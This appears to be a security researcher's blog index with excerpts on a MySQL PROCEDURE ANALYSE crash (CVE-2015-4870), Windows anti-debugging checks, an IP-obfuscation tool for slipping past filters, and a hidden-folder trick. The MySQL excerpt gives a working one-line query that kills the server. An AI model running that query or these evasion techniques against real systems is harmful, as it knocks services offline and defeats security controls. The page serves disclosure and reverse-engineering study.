MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a server crash I found in MySQL versions up to 5.5.45: passing a subquery as the first argument of PROCEDURE ANALYSE() kills mysqld.

Syntax:
[code language=”sql”]
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);
[/code]
So an example PoC would be:
[code language=”sql”]
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
[/code]
[code language=”sql”]
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect…
ERROR 2003 (HY000): Can’t connect to MySQL server on ‘localhost’ (10061)
ERROR:
Can’t connect to the server

mysql>
[/code]

The first error (2013) only shows that the session was dropped; the 2006 and 2003 errors on the reconnect attempt (10061 is WSAECONNREFUSED, so this run was on Windows) show that the mysqld process itself terminated, which is what makes this a denial of service rather than a single failed query.


(more…)

Parent Process Detection

By checking the parent process of a given process we can determine whether it is being debugged: a process launched by the user normally has explorer.exe as its parent, whereas a process started from inside a debugger has the debugger as its parent.
For this technique the Tlhelp32 process-snapshot APIs are used.

We also use a PROCESSENTRY32 structure, which receives the information about each process taken from the snapshot; the fields that matter here are th32ProcessID, th32ParentProcessID and szExeFile.

[code language=”C”]
typedef struct tagPROCESSENTRY32 {
    DWORD     dwSize;               /* must be set to sizeof(PROCESSENTRY32) before Process32First */
    DWORD     cntUsage;             /* unused, always 0 */
    DWORD     th32ProcessID;        /* PID of this process */
    ULONG_PTR th32DefaultHeapID;    /* unused, always 0 */
    DWORD     th32ModuleID;         /* unused, always 0 */
    DWORD     cntThreads;           /* number of threads started by the process */
    DWORD     th32ParentProcessID;  /* PID of the process that created this one */
    LONG      pcPriClassBase;       /* base priority of its threads */
    DWORD     dwFlags;              /* unused, always 0 */
    TCHAR     szExeFile[MAX_PATH];  /* image name, e.g. "explorer.exe" */
} PROCESSENTRY32, *PPROCESSENTRY32;
[/code]
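The check itself, written out as an added example (this is not the post's own code): the Toolhelp snapshot walk with CreateToolhelp32Snapshot, Process32First and Process32Next fills a table of (pid, ppid, image name), and the lookup that decides whether the parent is explorer.exe is kept separate so it can be exercised against a constructed table on any platform. The type and function names (proc_entry, parent_is_not_explorer, snapshot_processes) are my own; the snapshot code is compiled only under _WIN32 and assumes an ANSI (non-UNICODE) build so that szExeFile is a char array.

```c
/* Parent-process debugger check. Added example, not the post's code.
 * The snapshot walk (Windows only) fills a plain table; the decision
 * logic over that table is portable so it can be tested with a
 * constructed table. */
#undef UNICODE            /* keep PROCESSENTRY32.szExeFile as char[] */
#undef _UNICODE
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#include <tlhelp32.h>
#endif

#define MAX_PROCS 4096

typedef struct {
    unsigned long pid;
    unsigned long ppid;
    char name[260];       /* MAX_PATH on Windows */
} proc_entry;

/* Portable: entry whose pid equals `pid`, or NULL if it is not in the table */
static const proc_entry *find_proc(const proc_entry *t, size_t n, unsigned long pid) {
    for (size_t i = 0; i < n; i++)
        if (t[i].pid == pid) return &t[i];
    return NULL;
}

/* Image names are case-insensitive on Windows, so compare ASCII case-insensitively */
static int name_equals(const char *a, const char *b) {
    for (; *a && *b; a++, b++) {
        int ca = *a, cb = *b;
        if (ca >= 'A' && ca <= 'Z') ca += 'a' - 'A';
        if (cb >= 'A' && cb <= 'Z') cb += 'a' - 'A';
        if (ca != cb) return 0;
    }
    return *a == *b;
}

/* 1 if the parent of self_pid is anything other than explorer.exe (a debugger,
 * an IDE, or a parent that is missing from the snapshot because it already
 * exited); 0 if the parent is explorer.exe. */
int parent_is_not_explorer(const proc_entry *t, size_t n, unsigned long self_pid) {
    const proc_entry *self = find_proc(t, n, self_pid);
    if (!self) return 1;
    const proc_entry *parent = find_proc(t, n, self->ppid);
    if (!parent) return 1;
    return !name_equals(parent->name, "explorer.exe");
}

#ifdef _WIN32
/* Windows: copy the process snapshot into `t`; returns the number of entries */
static size_t snapshot_processes(proc_entry *t, size_t max) {
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return 0;
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe);           /* required before Process32First */
    size_t n = 0;
    if (Process32First(snap, &pe)) {
        do {
            t[n].pid  = pe.th32ProcessID;
            t[n].ppid = pe.th32ParentProcessID;
            strncpy(t[n].name, pe.szExeFile, sizeof(t[n].name) - 1);
            t[n].name[sizeof(t[n].name) - 1] = '\0';
            n++;
        } while (n < max && Process32Next(snap, &pe));
    }
    CloseHandle(snap);
    return n;
}
#endif

int main(void) {
#ifdef _WIN32
    static proc_entry table[MAX_PROCS];
    size_t n = snapshot_processes(table, MAX_PROCS);
    puts(parent_is_not_explorer(table, n, GetCurrentProcessId())
         ? "Parent is not explorer.exe: possibly started from a debugger"
         : "Parent is explorer.exe");
#else
    puts("Snapshot enumeration is Windows-only; the lookup logic is portable.");
#endif
    return 0;
}
```

Treat a mismatch as one signal, not proof: anything started from cmd.exe, a service, a scheduled task or a non-Explorer shell also fails the check, and because Windows reuses PIDs, th32ParentProcessID can point at an unrelated process once the real parent has exited.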

(more…)

IP Obfuscator

A simple tool, written in C by me, to convert an IP address into different obfuscated forms. I just wrote this for fun. You may use this when it comes to bypassing application filters and much more.


Example:
IP address of http://google.lk : http://222.165.163.91
Other forms in which you can write the same IP:

[+] http://3735397211
(more…)
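The conversions behind those forms, as an added example that is not the tool's own source: a strict dotted-quad parser and a function that renders the decimal, hex, octal, dotted-hex, dotted-octal and merged-octet forms of one address. The names parse_ipv4, obfuscate_ipv4 and ip_forms are mine, and the address 222.165.163.91 from the post is used as the sample input.

```c
/* IPv4 obfuscation forms. Added example, not the tool's own code. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

typedef struct {
    char decimal[16];      /* 3735397211                           */
    char hex[16];          /* 0xdea5a35b                           */
    char octal[16];        /* 033651321533                         */
    char dotted_hex[40];   /* 0xde.0xa5.0xa3.0x5b                  */
    char dotted_octal[24]; /* 0336.0245.0243.0133                  */
    char three_part[24];   /* 222.165.41819  (last two octets merged)   */
    char two_part[24];     /* 222.10855259   (last three octets merged) */
} ip_forms;

/* Strict dotted-quad parser: exactly four decimal octets in 0..255, no
 * leading '+', no trailing dot. Octets with leading zeros are read as
 * decimal here (inet_aton would read them as octal). Returns 1 and fills
 * *out in host byte order on success, 0 on any malformed input. */
int parse_ipv4(const char *s, unsigned long *out) {
    unsigned long v = 0;
    int octets = 0;
    while (*s) {
        if (!isdigit((unsigned char)*s)) return 0;
        unsigned long o = 0;
        while (isdigit((unsigned char)*s)) {
            o = o * 10 + (unsigned long)(*s++ - '0');
            if (o > 255) return 0;
        }
        v = (v << 8) | o;
        if (++octets > 4) return 0;
        if (*s == '.') {
            s++;
            if (*s == '\0') return 0;   /* trailing dot */
        } else if (*s != '\0') {
            return 0;                   /* junk after an octet */
        }
    }
    if (octets != 4) return 0;
    *out = v & 0xFFFFFFFFUL;
    return 1;
}

/* Render every form for one address; returns 0 if the input does not parse */
int obfuscate_ipv4(const char *ip, ip_forms *f) {
    unsigned long v;
    if (!parse_ipv4(ip, &v)) return 0;
    unsigned long a = (v >> 24) & 0xFF, b = (v >> 16) & 0xFF,
                  c = (v >> 8) & 0xFF,  d = v & 0xFF;
    snprintf(f->decimal, sizeof f->decimal, "%lu", v);
    snprintf(f->hex, sizeof f->hex, "0x%08lx", v);
    snprintf(f->octal, sizeof f->octal, "0%lo", v);
    snprintf(f->dotted_hex, sizeof f->dotted_hex,
             "0x%02lx.0x%02lx.0x%02lx.0x%02lx", a, b, c, d);
    snprintf(f->dotted_octal, sizeof f->dotted_octal,
             "0%03lo.0%03lo.0%03lo.0%03lo", a, b, c, d);
    /* "a.b.cd" and "a.bcd": the last field absorbs the remaining octets */
    snprintf(f->three_part, sizeof f->three_part, "%lu.%lu.%lu", a, b, (c << 8) | d);
    snprintf(f->two_part, sizeof f->two_part, "%lu.%lu", a, (b << 16) | (c << 8) | d);
    return 1;
}

int main(int argc, char **argv) {
    const char *ip = argc > 1 ? argv[1] : "222.165.163.91";  /* the post's example */
    ip_forms f;
    if (!obfuscate_ipv4(ip, &f)) {
        fprintf(stderr, "not a dotted-quad IPv4 address: %s\n", ip);
        return 1;
    }
    printf("[+] http://%s\n", f.decimal);
    printf("[+] http://%s\n", f.hex);
    printf("[+] http://%s\n", f.octal);
    printf("[+] http://%s\n", f.dotted_hex);
    printf("[+] http://%s\n", f.dotted_octal);
    printf("[+] http://%s\n", f.three_part);
    printf("[+] http://%s\n", f.two_part);
    return 0;
}
```

Which of these a given target accepts depends on its URL parser, not on the obfuscator: resolvers that follow the classic inet_aton rules take all of them, while filters that only match a dotted-decimal regex see none of them, which is exactly the gap the tool is meant to probe.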

Debugger Detection Using NtGlobalFlag

This is another simple anti-reversing trick used to detect a debugger. As I have shown earlier in my posts about the TEB structure and the PEB structure, NtGlobalFlag is located in the PEB structure at offset PEB+0x68 (104 decimal) on 32-bit Windows; on x64 the field sits at PEB+0xBC.

When a process is created under a debugger, the loader sets the heap flags FLG_HEAP_ENABLE_TAIL_CHECK (0x10), FLG_HEAP_ENABLE_FREE_CHECK (0x20) and FLG_HEAP_VALIDATE_PARAMETERS (0x40) in NtGlobalFlag, so the field reads 0x70.


(more…)

IsDebuggerPresent API

I was interested in learning about the anti-reversing techniques in the world of reverse engineering. There are so many techniques out there and I thought of trying a few of them and understanding them from the lowest level. I thought of sharing the things I've been experimenting with these days.
IsDebuggerPresent is a Windows API that can be used to detect a debugger. Here's an example:

[code language=”C”]
/*
* IsDebuggerPresent Example
* Author: Osanda Malith Jayathissa (@OsandaMalith)
* Website: http://osandamalith.wordpress.com
*/

#include <windows.h>

int main() {
    /* IsDebuggerPresent() returns non-zero when a user-mode debugger is
       attached to the calling process; 0x30 is MB_ICONWARNING */
    MessageBox(0, IsDebuggerPresent() ? "Debugger found" : "Debugger not found", "Status", 0x30);
    return 0;
}
[/code]

If we open it in a debugger, the “Debugger found” text is shown by the MessageBox API. How does this API work? Open IsDebuggerPresent in the debugger and you get the following piece of code (32-bit build), which does nothing more than read the BeingDebugged byte from the PEB:



[code language=”C”]
MOV EAX,DWORD PTR FS:[18]       ; FS:[0x18] = TEB.Self, a pointer to the current thread's TEB
MOV EAX,DWORD PTR DS:[EAX+30]   ; TEB+0x30 = ProcessEnvironmentBlock, the PEB pointer
MOVZX EAX,BYTE PTR DS:[EAX+2]   ; PEB+0x02 = BeingDebugged, zero-extended into EAX as the return value
[/code]
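The same TEB-to-PEB walk done by hand, as an added example that serves both this post and the NtGlobalFlag post above (it is not code from either post): on Windows it reads BeingDebugged at PEB+2 and NtGlobalFlag at PEB+0x68 (x86) or PEB+0xBC (x64) through NtCurrentTeb(), and the flag interpretation is kept in plain C so it can be checked with constructed values on any platform. The names current_peb, peb_being_debugged, peb_nt_global_flag, ntglobalflag_indicates_debugger and debug_indicators are my own.

```c
/* Manual PEB.BeingDebugged and PEB.NtGlobalFlag checks.
 * Added example, not the post's code. */
#include <stdio.h>

/* Heap flags the loader sets in PEB->NtGlobalFlag when the process is
 * created by a debugger; together they make the 0x70 value seen in the post */
#define FLG_HEAP_ENABLE_TAIL_CHECK   0x10
#define FLG_HEAP_ENABLE_FREE_CHECK   0x20
#define FLG_HEAP_VALIDATE_PARAMETERS 0x40
#define DEBUG_HEAP_FLAGS (FLG_HEAP_ENABLE_TAIL_CHECK | \
                          FLG_HEAP_ENABLE_FREE_CHECK | \
                          FLG_HEAP_VALIDATE_PARAMETERS)

/* 1 if all three heap flags are present. Other bits may be set as well
 * (gflags can add them), so test the mask instead of comparing the whole
 * register to 0x70. */
int ntglobalflag_indicates_debugger(unsigned long flag) {
    return (flag & DEBUG_HEAP_FLAGS) == DEBUG_HEAP_FLAGS;
}

/* Bitmask of which indicator fired: bit 0 = BeingDebugged, bit 1 = heap flags */
int debug_indicators(unsigned char being_debugged, unsigned long nt_global_flag) {
    int r = 0;
    if (being_debugged) r |= 1;
    if (ntglobalflag_indicates_debugger(nt_global_flag)) r |= 2;
    return r;
}

#ifdef _WIN32
#include <windows.h>

/* The PEB pointer lives at TEB+0x30 on x86 (what the disassembly reads
 * via FS:[0x18] then [EAX+0x30]) and at TEB+0x60 on x64 */
static const unsigned char *current_peb(void) {
    const unsigned char *teb = (const unsigned char *)NtCurrentTeb();
#ifdef _WIN64
    return *(const unsigned char *const *)(teb + 0x60);
#else
    return *(const unsigned char *const *)(teb + 0x30);
#endif
}

/* PEB+2 is BeingDebugged, the byte IsDebuggerPresent() returns */
unsigned char peb_being_debugged(void) {
    return current_peb()[2];
}

/* NtGlobalFlag: PEB+0x68 on x86, PEB+0xBC on x64 */
unsigned long peb_nt_global_flag(void) {
#ifdef _WIN64
    return *(const unsigned long *)(current_peb() + 0xBC);
#else
    return *(const unsigned long *)(current_peb() + 0x68);
#endif
}
#endif

int main(void) {
#ifdef _WIN32
    int ind = debug_indicators(peb_being_debugged(), peb_nt_global_flag());
    printf("BeingDebugged: %s, NtGlobalFlag heap flags: %s\n",
           (ind & 1) ? "set" : "clear", (ind & 2) ? "set" : "clear");
#else
    puts("PEB access is Windows-only; the flag logic is portable.");
#endif
    return 0;
}
```

Two caveats worth remembering when reading the result: the heap flags are only set when the debugger creates the process, so attaching to an already running process leaves NtGlobalFlag untouched while BeingDebugged flips to 1; and NtGlobalFlag can also be set without any debugger through the GlobalFlag value under Image File Execution Options, so the 0x70 pattern alone is not proof.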
(more…)

Magic Folder Hide

This is an application which I coded last year but forgot to write a blog post about. Using this tool you can create a '..' folder in Windows and store your data inside it. No one can access your files using Explorer since the path is not valid; they can only see the name.

This trick can be used in pentesting and is widely used by malware for hiding other malicious files. I coded this tool just for fun.


(more…)

My Journey into eWPT

Last year I thought of getting certified in the field of web application security, since I hadn't done any certifications before. I researched the current certifications in the market and found out that most of them are just answering a few MCQs and getting certified, but unfortunately those are highly accepted by different organizations. When it comes to the infosec industry, though, there's a bunch of good certifications I had in mind to complete someday. So, considering my budget, time and resources, I thought of taking eLearnSecurity's eWPT certification. This certification is highly hands-on and a fully practical penetration-test-based exam. When it comes to the industry it's hard to prove we know something, so I think I made the better choice in taking a certification in the field in which I have had experience since a young age. Apart from that, I wanted to get certified before I lose my teens.
(more…)